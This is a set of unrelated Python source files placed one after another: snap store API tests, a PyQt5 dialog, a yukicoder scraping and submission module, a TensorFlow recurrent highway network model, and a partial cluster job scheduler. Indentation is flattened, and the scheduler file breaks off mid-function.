'X-Ubuntu-Series': 16,
'X-Ubuntu-Architecture': 'amd64'
}
def tearDown(self):
pass
def test_hello(self):
r = self.c.get('/')
assert 'Hello' in r.data
def test_details_ok(self):
''' snap install bar '''
r = self.c.get('/api/v1/snaps/details/bar')
j = json.loads(r.data)
assert j['package_name'] == 'bar'
def test_details_empty(self):
''' snap install xyzzy '''
r = self.c.get('/api/v1/snaps/details/xyzzy', headers=self.headers)
j = json.loads(r.data)
assert 'No such package' in j['errors']
def test_search_old_install_path(self):
''' snap install bar (<= snapd 2.0.??) '''
r = self.c.get('/api/v1/search?q=package_name:"bar"')
j = json.loads(r.data)
assert j['_embedded']['clickindex:package'][0]['package_name'] == 'bar'
def test_search_all(self):
''' snap find '''
r = self.c.get('/api/v1/search?q=')
j = json.loads(r.data)
assert len(j['_embedded']['clickindex:package']) == 3
def test_search_partial(self):
''' snap find ba '''
r = self.c.get('/api/v1/search?q=ba')
j = json.loads(r.data)
assert len(j['_embedded']['clickindex:package']) == 2
def test_search_exact(self):
''' snap find foobar25 '''
r = self.c.get('/api/v1/search?q=foobar25')
j = json.loads(r.data)
assert j['_embedded']['clickindex:package'][0]['package_name'] == 'foobar25'
def test_metadata_local(self):
''' snap refresh (>= snapd 2.0.??)
with only snaps from our local repo '''
r = self.c.post('/api/v1/snaps/metadata',
data=json.dumps({'snaps': [
{'snap_id': 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxbar',
'revision': 1, 'confinement': 'strict'}],
"fields": ["download_url", "revision"]}),
headers=self.headers)
j = json.loads(r.data)
assert len(j['_embedded']['clickindex:package']) == 1
def test_metadata_remote(self):
''' snap refresh (>= snapd 2.0.??)
with only snaps from upstream repo '''
r = self.c.post('/api/v1/snaps/metadata',
data=json.dumps({'snaps': [
{'snap_id': 'mVyGrEwiqSi5PugCwyH7WgpoQLemtTd6',
'revision': 1, 'confinement': 'strict'}],
"fields": ["download_url", "revision"]}),
headers=self.headers)
j = json.loads(r.data)
assert len(j['_embedded']['clickindex:package']) == 1
def test_metadata_mixed(self):
''' snap refresh (>= snapd 2.0.??)
with snaps from both local and remote '''
r = self.c.post('/api/v1/snaps/metadata',
data=json.dumps({'snaps': [
{'snap_id': 'mVyGrEwiqSi5PugCwyH7WgpoQLemtTd6',
'revision': 1, 'confinement': 'strict'},
{'snap_id': 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxbar',
'revision': 1, 'confinement': 'strict'}
],
"fields": ["download_url", "revision"]}),
headers=self.headers)
j = json.loads(r.data)
assert len(j['_embedded']['clickindex:package']) == 2
if __name__ == '__main__':
unittest.main()
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'C:\Users\conta\Documents\script\Wizard\App\work\ui_files\email_confirm_dialog.ui'
#
# Created by: PyQt5 UI code generator 5.13.0
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(327, 304)
self.verticalLayout = QtWidgets.QVBoxLayout(Dialog)
self.verticalLayout.setObjectName("verticalLayout")
self.frame = QtWidgets.QFrame(Dialog)
self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame.setObjectName("frame")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.frame)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.confirm_email_title_label = QtWidgets.QLabel(self.frame)
self.confirm_email_title_label.setObjectName("confirm_email_title_label")
self.verticalLayout_2.addWidget(self.confirm_email_title_label)
self.formLayout = QtWidgets.QFormLayout()
self.formLayout.setObjectName("formLayout")
self.verification_lineEdit = QtWidgets.QLineEdit(self.frame)
self.verification_lineEdit.setFocusPolicy(QtCore.Qt.WheelFocus)
self.verification_lineEdit.setObjectName("verification_lineEdit")
self.formLayout.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.verification_lineEdit)
self.label_2 = QtWidgets.QLabel(self.frame)
self.label_2.setObjectName("label_2")
self.formLayout.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.label_2)
self.verticalLayout_2.addLayout(self.formLayout)
spacerItem = QtWidgets.QSpacerItem(20, 34, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.verticalLayout_2.addItem(spacerItem)
self.confirm_pushButton = QtWidgets.QPushButton(self.frame)
self.confirm_pushButton.setMinimumSize(QtCore.QSize(0, 70))
self.confirm_pushButton.setMaximumSize(QtCore.QSize(16777215, 70))
self.confirm_pushButton.setObjectName("confirm_pushButton")
self.verticalLayout_2.addWidget(self.confirm_pushButton)
self.recover_pushButton = QtWidgets.QPushButton(self.frame)
self.recover_pushButton.setObjectName("recover_pushButton")
self.verticalLayout_2.addWidget(self.recover_pushButton)
self.verticalLayout.addWidget(self.frame)
self.log_frame = QtWidgets.QFrame(Dialog)
self.log_frame.setObjectName("log_frame")
self.log_layout = QtWidgets.QHBoxLayout(self.log_frame)
self.log_layout.setContentsMargins(0, 0, 0, 0)
self.log_layout.setSpacing(0)
self.log_layout.setObjectName("log_layout")
self.log_lineEdit = QtWidgets.QLineEdit(self.log_frame)
self.log_lineEdit.setReadOnly(True)
self.log_lineEdit.setObjectName("log_lineEdit")
self.log_layout.addWidget(self.log_lineEdit)
self.verticalLayout.addWidget(self.log_frame)
self.retranslateUi(Dialog)
self.recover_pushButton.clicked.connect(Dialog.reject)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
self.confirm_email_title_label.setText(_translate("Dialog", "Your received a code by email"))
self.label_2.setText(_translate("Dialog", "Verification code"))
self.confirm_pushButton.setText(_translate("Dialog", "Confirm"))
self.recover_pushButton.setText(_translate("Dialog", "I don\'t receive this email, change email"))
self.log_lineEdit.setPlaceholderText(_translate("Dialog", "Warnings and logs here..."))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Dialog = QtWidgets.QDialog()
ui = Ui_Dialog()
ui.setupUi(Dialog)
Dialog.show()
sys.exit(app.exec_())
|
<filename>onlinejudge/service/yukicoder.py
# Python Version: 3.x
# -*- coding: utf-8 -*-
"""
the module for yukicoder (https://yukicoder.me/)
:note: There is the official API https://petstore.swagger.io/?url=https://yukicoder.me/api/swagger.yaml
"""
import json
import posixpath
import urllib.parse
from typing import *
import bs4
import onlinejudge._implementation.logging as log
import onlinejudge._implementation.testcase_zipper
import onlinejudge._implementation.utils as utils
import onlinejudge.dispatch
from onlinejudge.type import *
class YukicoderService(onlinejudge.type.Service):
def get_url_of_login_page(self):
return self.get_url()
def is_logged_in(self, *, session: Optional[requests.Session] = None, method: Optional[str] = None) -> bool:
session = session or utils.get_default_session()
url = 'https://yukicoder.me/auth/github'
resp = utils.request('GET', url, session=session, allow_redirects=False)
assert resp.status_code == 302
return 'oauth' not in resp.headers['Location']
def get_url(self) -> str:
return 'https://yukicoder.me/'
def get_name(self) -> str:
return 'yukicoder'
@classmethod
def from_url(cls, url: str) -> Optional['YukicoderService']:
# example: http://yukicoder.me/
result = urllib.parse.urlparse(url)
if result.scheme in ('', 'http', 'https') \
and result.netloc == 'yukicoder.me':
return cls()
return None
def _issue_official_api(self, api: str, id: Optional[int] = None, name: Optional[str] = None, *, session: Optional[requests.Session] = None) -> Any:
assert (id is not None) != (name is not None)
if id is not None:
assert isinstance(id, int)
sometihng = {'user': '', 'solved': 'id/'}[api]
url = 'https://yukicoder.me/api/v1/{}/{}{}'.format(api, sometihng, id)
else:
assert name is not None
url = 'https://yukicoder.me/api/v1/{}/name/{}'.format(api, urllib.parse.quote(name))
session = session or utils.get_default_session()
try:
resp = utils.request('GET', url, session=session)
except requests.exceptions.HTTPError:
# {"Message":"指定したユーザーは存在しません"} がbodyに入っているはずだがNoneに潰す
return None
return json.loads(resp.content.decode(resp.encoding))
# example: {"Id":10,"Name":"yuki2006","Solved":280,"Level":34,"Rank":59,"Score":52550,"Points":7105,"Notice":"匿名ユーザーの情報は取れません。ユーザー名が重複している場合は最初に作られたIDが優先されます(その場合は運営にご報告いただければマージします)。このAPIはベータ版です。予告なく変更される場合があります。404を返したら廃止です。"}
def get_user(self, *args, **kwargs) -> Dict[str, Any]:
"""
.. deprecated:: 6.0.0
This method may be deleted in future.
"""
return self._issue_official_api('user', *args, **kwargs)
# https://twitter.com/yukicoder/status/935943170210258944
# example: [{"No":46,"ProblemId":43,"Title":"はじめのn歩","AuthorId":25,"TesterId":0,"Level":1,"ProblemType":0,"Tags":"実装"}]
def get_solved(self, *args, **kwargs) -> List[Dict[str, Any]]:
"""
.. deprecated:: 6.0.0
This method may be deleted in future.
"""
return self._issue_official_api('solved', *args, **kwargs)
# example: https://yukicoder.me/users/237/favorite
def get_user_favorite(self, id: int, *, session: Optional[requests.Session] = None) -> List[Any]:
"""
.. deprecated:: 6.0.0
This method may be deleted in future.
"""
url = 'https://yukicoder.me/users/%d/favorite' % id
columns, rows = self._get_and_parse_the_table(url, session=session)
assert columns == ['#', '提出時間', '提出者', '問題', '言語', '結果', '実行時間', 'コード長']
for row in rows:
for column in columns:
if row[column].find('a'):
row[column + '/url'] = row[column].find('a').attrs.get('href')
if column == '#':
row[column] = int(row[column].text)
else:
row[column] = row[column].text.strip()
return rows
# example: https://yukicoder.me/users/504/favoriteProblem
def get_user_favorite_problem(self, id, session: Optional[requests.Session] = None) -> List[Any]:
"""
.. deprecated:: 6.0.0
This method may be deleted in future.
"""
url = 'https://yukicoder.me/users/%d/favoriteProblem' % id
columns, rows = self._get_and_parse_the_table(url, session=session)
assert columns == ['ナンバー', '問題名', 'レベル', 'タグ', '時間制限', 'メモリ制限', '作問者']
for row in rows:
for column in columns:
if row[column].find('a'):
row[column + '/url'] = row[column].find('a').attrs.get('href')
if column == 'ナンバー':
row[column] = int(row[column].text)
elif column == 'レベル':
row[column] = self._parse_star(row[column])
elif column == 'タグ':
# NOTE: 現在(2017/11/01)の仕様だと 練習モード「ゆるふわ」 でないとACしててもタグが非表示
# NOTE: ログインしてないとタグが非表示の仕様
# NOTE: ログインしてるはずだけどrequestsからGETしてもタグが降ってこない場合は適切な Session objectを指定してるか確認
row[column] = row[column].text.strip().split()
else:
row[column] = row[column].text.strip()
return rows
# example: https://yukicoder.me/users/1786/favoriteWiki
def get_user_favorite_wiki(self, id: int, *, session: Optional[requests.Session] = None) -> List[Any]:
"""
.. deprecated:: 6.0.0
This method may be deleted in future.
"""
url = 'https://yukicoder.me/users/%d/favoriteWiki' % id
columns, rows = self._get_and_parse_the_table(url, session=session)
assert columns == ['Wikiページ']
for row in rows:
for column in columns:
row[column + '/url'] = row[column].find('a').attrs.get('href')
row[column] = row[column].text.strip()
return rows
# example: https://yukicoder.me/submissions?page=4220
# example: https://yukicoder.me/submissions?page=2192&status=AC
# NOTE: 1ページしか読まない 全部欲しい場合は呼び出し側で頑張る
def get_submissions(self, *, page: int, status: Optional[str] = None, session: Optional[requests.Session] = None) -> List[Any]:
"""
.. deprecated:: 6.0.0
This method may be deleted in future.
"""
assert isinstance(page, int) and page >= 1
url = 'https://yukicoder.me/submissions?page=%d' % page
if status is not None:
assert status in 'AC WA RE TLE MLE OLE J_TLE CE WJ Judge NoOut IE'.split()
url += '&status=' + status
columns, rows = self._get_and_parse_the_table(url, session=session)
assert columns == ['#', '提出日時', '', '提出者', '問題', '言語', '結果', '実行時間', 'コード長'] # 空白は「このユーザーの提出の表示」の虫眼鏡のため
for row in rows:
for column in columns:
if column and row[column].find('a'):
row[column + '/url'] = row[column].find('a').attrs.get('href')
if column == '#':
row[column] = int(row[column].text)
elif column == '':
del row[column]
else:
row[column] = row[column].text.strip()
return rows
# example: https://yukicoder.me/problems?page=2
# NOTE: loginしてると
def get_problems(self, *, page: int, comp_problem: bool = True, other: bool = False, sort: Optional[str] = None, session: Optional[requests.Session] = None) -> List[Any]:
"""
.. deprecated:: 6.0.0
This method may be deleted in future.
"""
assert isinstance(page, int) and page >= 1
url = 'https://yukicoder.me/problems'
if other:
url += '/other'
url += '?page=%d' % page
if comp_problem: # 未完成問題は(ログインしてても)デフォルトで除外
url += '&comp_problem=on'
if sort is not None:
assert sort in (
'no_asc',
'level_asc',
'level_desc',
'solved_asc',
'solved_desc',
'fav_asc',
'fav_desc',
)
url += '&sort=' + sort
columns, rows = self._get_and_parse_the_table(url, session=session)
assert columns == ['ナンバー', '問題名', 'レベル', 'タグ', '作問者', '解いた人数', 'Fav']
for row in rows:
for column in columns:
if column and row[column].find('a'):
row[column + '/url'] = row[column].find('a').attrs.get('href')
if column in ('ナンバー', '解いた人数', 'Fav'):
row[column] = int(row[column].text)
elif column == 'レベル':
row[column] = self._parse_star(row[column])
elif column == 'タグ':
# NOTE: ログインしてないとタグが非表示の仕様
# NOTE: ログインしてるはずだけどrequestsからGETしてもタグが降ってこない場合は適切な Session objectを指定してるか確認
row[column] = row[column].text.strip().split()
else:
row[column] = row[column].text.strip()
return rows
def _get_and_parse_the_table(self, url: str, *, session: Optional[requests.Session] = None) -> Tuple[List[Any], List[Dict[str, bs4.Tag]]]:
# get
session = session or utils.get_default_session()
resp = utils.request('GET', url, session=session)
# parse
soup = bs4.BeautifulSoup(resp.content.decode(resp.encoding), utils.html_parser)
assert len(soup.find_all('table')) == 1
table = soup.find('table')
columns = [th.text.strip() for th in table.find('thead').find('tr') if th.name == 'th']
data = [] # type: List[Dict[str, List[str]]]
for row in table.find('tbody').find_all('tr'):
values = [td for td in row if td.name == 'td']
assert len(columns) == len(values)
data += [dict(zip(columns, values))]
return columns, data
def _parse_star(self, tag: bs4.Tag) -> str:
star = str(len(tag.find_all(class_='fa-star')))
if tag.find_all(class_='fa-star-half-full'):
star += '.5'
return star
class YukicoderProblem(onlinejudge.type.Problem):
def __init__(self, *, problem_no=None, problem_id=None):
assert problem_no or problem_id
assert not problem_no or isinstance(problem_no, int)
assert not problem_id or isinstance(problem_id, int)
self.problem_no = problem_no
self.problem_id = problem_id
def download_sample_cases(self, *, session: Optional[requests.Session] = None) -> List[TestCase]:
session = session or utils.get_default_session()
# get
resp = utils.request('GET', self.get_url(), session=session)
# parse
soup = bs4.BeautifulSoup(resp.content.decode(resp.encoding), utils.html_parser)
samples = onlinejudge._implementation.testcase_zipper.SampleZipper()
for pre in soup.select('.sample pre'):
log.debug('pre: %s', str(pre))
it = self._parse_sample_tag(pre)
if it is not None:
data, name = it
samples.add(data.encode(), name)
return samples.get()
def download_system_cases(self, *, session: Optional[requests.Session] = None) -> List[TestCase]:
"""
:raises NotLoggedInError:
"""
session = session or utils.get_default_session()
if not self.get_service().is_logged_in(session=session):
raise NotLoggedInError
url = 'https://yukicoder.me/problems/no/{}/testcase.zip'.format(self.problem_no)
resp = utils.request('GET', url, session=session)
fmt = 'test_%e/%s'
return onlinejudge._implementation.testcase_zipper.extract_from_zip(resp.content, fmt)
def _parse_sample_tag(self, tag: bs4.Tag) -> Optional[Tuple[str, str]]:
assert isinstance(tag, bs4.Tag)
assert tag.name == 'pre'
prv = utils.previous_sibling_tag(tag)
pprv = tag.parent and utils.previous_sibling_tag(tag.parent)
if prv.name == 'h6' and tag.parent.name == 'div' and tag.parent['class'] == ['paragraph'] and pprv.name == 'h5':
log.debug('h6: %s', str(prv))
log.debug('name.encode(): %s', prv.string.encode())
s = utils.parse_content(tag)
return utils.textfile(s.lstrip()), pprv.string + ' ' + prv.string
return None
def submit_code(self, code: bytes, language_id: LanguageId, *, filename: Optional[str] = None, session: Optional[requests.Session] = None) -> onlinejudge.type.Submission:
"""
:raises NotLoggedInError:
"""
session = session or utils.get_default_session()
# get
url = self.get_url() + '/submit'
resp = utils.request('GET', url, session=session)
# parse
soup = bs4.BeautifulSoup(resp.content.decode(resp.encoding), utils.html_parser)
form = soup.find('form', id='submit_form')
if not form:
log.error('form not found')
raise NotLoggedInError
# post
form = utils.FormSender(form, url=resp.url)
form.set('lang', language_id)
form.set_file('file', filename or 'code', code)
form.unset('custom_test')
resp = form.request(session=session)
resp.raise_for_status()
# result
if 'submissions' in resp.url:
# example: https://yukicoder.me/submissions/314087
log.success('success: result: %s', resp.url)
return utils.DummySubmission(resp.url, problem=self)
else:
log.failure('failure')
soup = bs4.BeautifulSoup(resp.content.decode(resp.encoding), utils.html_parser)
for div in soup.findAll('div', attrs={'role': 'alert'}):
log.warning('yukicoder says: "%s"', div.string)
raise SubmissionError
def get_available_languages(self, *, session: Optional[requests.Session] = None) -> List[Language]:
session = session or utils.get_default_session()
# get
# We use the problem page since it is available without logging in
resp = utils.request('GET', self.get_url(), session=session)
# parse
soup = bs4.BeautifulSoup(resp.content.decode(resp.encoding), utils.html_parser)
select = soup.find('select', id='lang')
languages = [] # type: List[Language]
for option in select.find_all('option'):
languages += [Language(option.attrs['value'], ' '.join(option.string.split()))]
return languages
def get_url(self) -> str:
if self.problem_no:
return 'https://yukicoder.me/problems/no/{}'.format(self.problem_no)
elif self.problem_id:
return 'https://yukicoder.me/problems/{}'.format(self.problem_id)
else:
raise ValueError
@classmethod
def from_url(cls, url: str) -> Optional['YukicoderProblem']:
# example: https://yukicoder.me/problems/no/499
# example: http://yukicoder.me/problems/1476
result = urllib.parse.urlparse(url)
dirname, basename = posixpath.split(utils.normpath(result.path))
if result.scheme in ('', 'http', 'https') \
and result.netloc == 'yukicoder.me':
n = None # type: Optional[int]
try:
n = int(basename)
except ValueError:
pass
if n is not None:
if dirname == '/problems/no':
return cls(problem_no=int(n))
if dirname == '/problems':
return cls(problem_id=int(n))
return cls()
return None
def get_service(self) -> YukicoderService:
return YukicoderService()
def get_input_format(self, *, session: Optional[requests.Session] = None) -> Optional[str]:
session = session or utils.get_default_session()
# get
resp = utils.request('GET', self.get_url(), session=session)
# parse
soup = bs4.BeautifulSoup(resp.content.decode(resp.encoding), utils.html_parser)
for h4 in soup.find_all('h4'):
if h4.string == '入力':
return h4.parent.find('pre').decode_contents(formatter=None)
return None
onlinejudge.dispatch.services += [YukicoderService]
onlinejudge.dispatch.problems += [YukicoderProblem]
|
from __future__ import absolute_import, division, print_function
import tensorflow as tf
import numpy as np
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.ops import math_ops, array_ops
from tensorflow.python.util import nest
from tensorflow.python.ops.nn import rnn_cell
RNNCell = rnn_cell.RNNCell
class Model(object):
"""A Variational RHN model."""
def __init__(self, is_training, config):
self.batch_size = batch_size = config.batch_size
self.num_steps = num_steps = config.num_steps
self.depth = depth = config.depth
self.size = size = config.hidden_size
self.num_layers = num_layers = config.num_layers
vocab_size = config.vocab_size
if vocab_size < self.size and not config.tied:
in_size = vocab_size
else:
in_size = self.size
self.in_size = in_size
self._input_data = tf.placeholder(tf.int32, [batch_size, num_steps])
self._targets = tf.placeholder(tf.int32, [batch_size, num_steps])
self._noise_x = tf.placeholder(tf.float32, [batch_size, num_steps, 1])
self._noise_i = tf.placeholder(tf.float32, [batch_size, in_size, num_layers])
self._noise_h = tf.placeholder(tf.float32, [batch_size, size, num_layers])
self._noise_o = tf.placeholder(tf.float32, [batch_size, 1, size])
with tf.device("/cpu:0"):
embedding = tf.get_variable("embedding", [vocab_size, in_size])
inputs = tf.nn.embedding_lookup(embedding, self._input_data) * self._noise_x
outputs = []
self._initial_state = [0] * self.num_layers
state = [0] * self.num_layers
self._final_state = [0] * self.num_layers
for l in range(config.num_layers):
with tf.variable_scope('RHN' + str(l)):
cell = RHNCell(size, in_size, is_training, depth=depth, forget_bias=config.init_bias)
self._initial_state[l] = cell.zero_state(batch_size, tf.float32)
state[l] = [self._initial_state[l], self._noise_i[:, :, l], self._noise_h[:, :, l]]
for time_step in range(num_steps):
if time_step > 0:
tf.get_variable_scope().reuse_variables()
(cell_output, state[l]) = cell(inputs[:, time_step, :], state[l])
outputs.append(cell_output)
inputs = tf.pack(outputs, axis=1)
outputs = []
output = tf.reshape(inputs * self._noise_o, [-1, size])
softmax_w = tf.transpose(embedding) if config.tied else tf.get_variable("softmax_w", [size, vocab_size])
softmax_b = tf.get_variable("softmax_b", [vocab_size])
logits = tf.matmul(output, softmax_w) + softmax_b
loss = tf.nn.seq2seq.sequence_loss_by_example(
[logits],
[tf.reshape(self._targets, [-1])],
[tf.ones([batch_size * num_steps])])
self._final_state = [s[0] for s in state]
pred_loss = tf.reduce_sum(loss) / batch_size
self._cost = cost = pred_loss
if not is_training:
return
tvars = tf.trainable_variables()
l2_loss = tf.add_n([tf.nn.l2_loss(v) for v in tvars])
self._cost = cost = pred_loss + config.weight_decay * l2_loss
self._lr = tf.Variable(0.0, trainable=False)
self._nvars = np.prod(tvars[0].get_shape().as_list())
print(tvars[0].name, tvars[0].get_shape().as_list())
for var in tvars[1:]:
sh = var.get_shape().as_list()
print(var.name, sh)
self._nvars += np.prod(sh)
print(self._nvars, 'total variables')
grads, _ = tf.clip_by_global_norm(tf.gradients(cost, tvars),
config.max_grad_norm)
optimizer = tf.train.GradientDescentOptimizer(self.lr)
self._train_op = optimizer.apply_gradients(zip(grads, tvars))
def assign_lr(self, session, lr_value):
session.run(tf.assign(self.lr, lr_value))
@property
def input_data(self):
return self._input_data
@property
def targets(self):
return self._targets
@property
def noise_x(self):
return self._noise_x
@property
def noise_i(self):
return self._noise_i
@property
def noise_h(self):
return self._noise_h
@property
def noise_o(self):
return self._noise_o
@property
def initial_state(self):
return self._initial_state
@property
def cost(self):
return self._cost
@property
def final_state(self):
return self._final_state
@property
def lr(self):
return self._lr
@property
def train_op(self):
return self._train_op
@property
def nvars(self):
return self._nvars
class RHNCell(RNNCell):
"""Variational Recurrent Highway Layer
Reference: https://arxiv.org/abs/1607.03474
"""
def __init__(self, num_units, in_size, is_training, depth=3, forget_bias=None):
self._num_units = num_units
self._in_size = in_size
self.is_training = is_training
self.depth = depth
self.forget_bias = forget_bias
@property
def input_size(self):
return self._in_size
@property
def output_size(self):
return self._num_units
@property
def state_size(self):
return self._num_units
def __call__(self, inputs, state, scope=None):
current_state = state[0]
noise_i = state[1]
noise_h = state[2]
for i in range(self.depth):
with tf.variable_scope('h_'+str(i)):
if i == 0:
h = tf.tanh(linear([inputs * noise_i, current_state * noise_h], self._num_units, True))
else:
h = tf.tanh(linear([current_state * noise_h], self._num_units, True))
with tf.variable_scope('t_'+str(i)):
if i == 0:
t = tf.sigmoid(linear([inputs * noise_i, current_state * noise_h], self._num_units, True, self.forget_bias))
else:
t = tf.sigmoid(linear([current_state * noise_h], self._num_units, True, self.forget_bias))
current_state = (h - current_state)* t + current_state
return current_state, [current_state, noise_i, noise_h]
def linear(args, output_size, bias, bias_start=None, scope=None):
"""
This is a slightly modified version of _linear used by Tensorflow rnn.
The only change is that we have allowed bias_start=None.
Linear map: sum_i(args[i] * W[i]), where W[i] is a variable.
Args:
args: a 2D Tensor or a list of 2D, batch x n, Tensors.
output_size: int, second dimension of W[i].
bias: boolean, whether to add a bias term or not.
bias_start: starting value to initialize the bias; 0 by default.
scope: VariableScope for the created subgraph; defaults to "Linear".
Returns:
A 2D Tensor with shape [batch x output_size] equal to
sum_i(args[i] * W[i]), where W[i]s are newly created matrices.
Raises:
ValueError: if some of the arguments has unspecified or wrong shape.
"""
if args is None or (nest.is_sequence(args) and not args):
raise ValueError("`args` must be specified")
if not nest.is_sequence(args):
args = [args]
# Calculate the total size of arguments on dimension 1.
total_arg_size = 0
shapes = [a.get_shape().as_list() for a in args]
for shape in shapes:
if len(shape) != 2:
raise ValueError("Linear is expecting 2D arguments: %s" % str(shapes))
if not shape[1]:
raise ValueError("Linear expects shape[1] of arguments: %s" % str(shapes))
else:
total_arg_size += shape[1]
dtype = [a.dtype for a in args][0]
# Now the computation.
with vs.variable_scope(scope or "Linear"):
matrix = vs.get_variable(
"Matrix", [total_arg_size, output_size], dtype=dtype)
if len(args) == 1:
res = math_ops.matmul(args[0], matrix)
else:
res = math_ops.matmul(array_ops.concat(1, args), matrix)
if not bias:
return res
elif bias_start is None:
bias_term = vs.get_variable("Bias", [output_size], dtype=dtype)
else:
bias_term = vs.get_variable("Bias", [output_size], dtype=dtype,
initializer=tf.constant_initializer(bias_start, dtype=dtype))
return res + bias_term
|
# scheduler.py is used to submit, schedule, run jobs on the cluster.
import os,sys,fcntl,subprocess,random,traceback,errno
from time import sleep,time,ctime
import ujson
sys.path.append('/home/ben/code')
sys.path.append('/home/ben/file_transfer')
from manage_cluster import ManageCluster
from file_transfer import FileTransfer
from configs_parser import get_configs
# for running jobs submitted through the Scheduler
class Runner():
def __init__(self):
# configs
configs = get_configs(self.__module__)
self.local_working_dir = configs['local_working_dir']
# shared references
self.manage_cluster = ManageCluster()
self.manage_cluster.start_cluster()
self.file_transfer = FileTransfer()
self.scheduler = Scheduler()
self.finished_jobs = None
def run(self):
self.finished_jobs = set([])
while True:
job = self._get_next_job()
if job:
print 'STARTING JOB FROM SCHEDULER...'
start_time = time()
success,exception = self._run_job(job)
print 'FINISHED JOB FROM SCHEDULER...'
end_time = time()
self._mark_job_as_finished(job,success,exception,start_time,end_time)
else:
sleep(2)
def _get_next_job(self):
all_jobs = self.scheduler._get_jobs()
for job in all_jobs:
job_name = job['job_name']
force_run = job['force_run']
if force_run and job_name in self.finished_jobs:
self.finished_jobs.remove(job_name)
if job_name not in self.finished_jobs:
return job
self.finished_jobs = set([])
return False
def _run_job(self,job):
self._print_job(job)
self._write_current_job(job)
job_type = job['job_type']
if job_type == 'mapreduce':
success = self._run_mapreduce_job(job)
elif job_type == 'script':
success = self._run_script(job)
elif job_type == 'file_transfer':
success = self._run_file_transfer(job)
# note: success is a tuple.
return success
def _print_job(self,job):
print 'RUNNING JOB:'
for key in job:
val = job[key]
print '\t',key+':',val
print '---\n'
def _mark_job_as_finished(self,job,success,exception,start_time,end_time):
job_name = job['job_name']
self.finished_jobs.add(job_name)
self.scheduler._mark_job_as_finished(job,success,exception,start_time,end_time)
def _write_current_job(self,job):
fn = self.local_working_dir + '/CURRENT_JOB.data'
f = open(fn,'w')
s = ujson.dumps(job)
f.write(s)
f.close()
def _run_mapreduce_job(self,job):
# set job parameters and run
try:
self.manage_cluster.run(job)
exception = None
return (True,exception)
except:
exception = traceback.format_exc()
current_phase = self.manage_cluster.current_phase
print exception
return (False,(exception,current_phase))
def _run_script(self,job):
# get script parameters
script_location = job['script_location']
script_arguments = job['script_arguments']
if script_arguments:
script = ['python',script_location] + script_arguments
else:
script = ['python',script_location]
# run script
try:
val = subprocess.check_output(script,shell=False)
exception = None
return (True,exception)
except:
exception = traceback.format_exc()
print exception
return (False,exception)
def _run_file_transfer(self,job):
job_type = job['job_type']
job_name = job['job_name']
job_priority = job['job_priority']
# upload/download
input_dir = job['input_dir']
output_dir = job['output_dir']
transfer_type = job['transfer_type']
reload_files = job['reload_files']
delete_files = job['delete_files']
compress = job['compress']
# upload auxiliary
input_file_name = job['input_file_name']
auxiliary_data_name = job['auxiliary_data_name']
try:
if transfer_type == 'upload':
self.file_transfer.upload(input_dir,output_dir,reload_files)
elif transfer_type == 'upload_bulk':
self.file_transfer.upload_bulk(input_dir,output_dir,reload_files,compress)
elif transfer_type == 'download':
self.file_transfer.download(input_dir,output_dir,delete_files)
elif transfer_type == 'download_bulk':
self.file_transfer.download_bulk(input_dir,output_dir,delete_files)
elif transfer_type == 'upload_auxiliary':
self.file_transfer.upload_auxiliary(input_file_name,auxiliary_data_name)
elif transfer_type == 'delete':
self.file_transfer.delete_files(output_dir)
exception = None
return (True,exception)
except:
exception = traceback.format_exc()
print exception
return (False,exception)
# for controling workflow for the Runner
class Scheduler():
def __init__(self):
# configs
configs = get_configs(self.__module__)
self.local_working_dir = configs['local_working_dir']
self.job_submitter = os.path.expanduser('~')
# shared references
self.scheduler_token = None
def submit_job(self,job):
job_name = job['job_name']
print 'ATTEMPTING:',job_name
if self._is_correctly_specified(job):
new_jobs = []
existing_jobs = self._get_jobs()
job_name = job['job_name']
for existing_job in existing_jobs:
existing_job_name = existing_job['job_name']
if existing_job_name != job_name:
new_jobs.append(existing_job)
else:
print 'FOUND EXISTING JOB/OVERWRITING:'
for key in existing_job:
print '\t',key,existing_job[key]
new_jobs.append(job)
attempts = 0
while attempts < 100:
if self._lock_scheduler():
fn = self.local_working_dir +'/JOBS.data'
f = open(fn,'w')
for job in new_jobs:
s = ujson.dumps(job)
f.write(s+'\n')
f.close()
self._unlock_scheduler()
print 'ACCEPTED:',job_name
break
else:
attempts = attempts + 1
sleep(random.uniform(0.05,0.10))
else:
print 'JOB MISSPECIFIED/JOB REJECTED:'
for key in job:
print '\t',key,job[key]
print '---\n'
def _is_correctly_specified(self,job):
correct = True
job_priority = job['job_priority']
if job_priority or job_priority == 0:
job_type = job['job_type']
if job_type == 'mapreduce':
job_template = self.get_mapreduce_job_template()
template_keys = set(job_template.keys())
job_keys = set(job.keys())
if template_keys != job_keys:
print 'JOB NOT CREATED WITH TEMPLATE...'
correct = False
return correct
# required
job_name = job['job_name']
project_name = job['project_name']
input_dirs = job['input_dirs']
max_number_dumped_items_shuffler = job['max_number_dumped_items_shuffler']
simultaneous_files_in_redis = job['simultaneous_files_in_redis']
reduce_function_name = job['reduce_function_name']
max_number_dumped_items_reducer = job['max_number_dumped_items_reducer']
if not job_name:
print 'MISSING JOB NAME...'
correct = False
if not project_name:
print 'MISSING PROJECT NAME...'
correct = False
if not input_dirs:
print 'MISSING INPUT DIRS...'
correct = False
if not max_number_dumped_items_shuffler:
print 'MISSING MAX NUMBER DUMPED ITEMS SHUFFLER...'
correct = False
if not simultaneous_files_in_redis:
print 'MISSING SIMULTANEOUS FILES IN REDIS...'
correct = False
if not reduce_function_name:
print 'MISSING REDUCE FUNCTION NAME...'
correct = False
